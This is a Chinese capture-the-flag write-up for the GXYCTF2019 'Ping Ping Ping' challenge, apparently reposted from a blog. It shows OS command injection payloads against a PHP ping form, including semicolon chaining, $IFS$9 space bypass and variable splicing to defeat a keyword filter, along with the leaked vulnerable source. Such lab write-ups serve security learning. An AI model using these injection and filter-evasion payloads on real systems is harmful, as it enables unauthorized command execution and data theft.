标签：ip Ping flag fxck php GXYCTF2019 match

[GXYCTF2019]Ping Ping Ping

进入环境输个ip发现就是在ping这个ip地址，我们尝试使用分号来执行命令

发现flag.php可惜不能直接cat flag.php估计绊掉了，那我们cat index.php看看还是不行，尝试绕过了一下空格，原来空格也过滤了，这样一来源码就出来了

?ip=127.0.0.1;cat$IFS$9index.php

源码如下

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}

?>

过滤了很多东西但是发现了一种方法可以绕过

?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

我们通过;来拼接执行执行代码，通过$IFS$9绕过空格限制，然后拼接指令即可，但这里过滤了flag，要绕过正则匹配必须fl写在后面的哪个变量中

查看源码即可发现flag

标签：ip,Ping,flag,fxck,php,GXYCTF2019,match
来源： https://blog.csdn.net/weixin_52268949/article/details/122812761

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。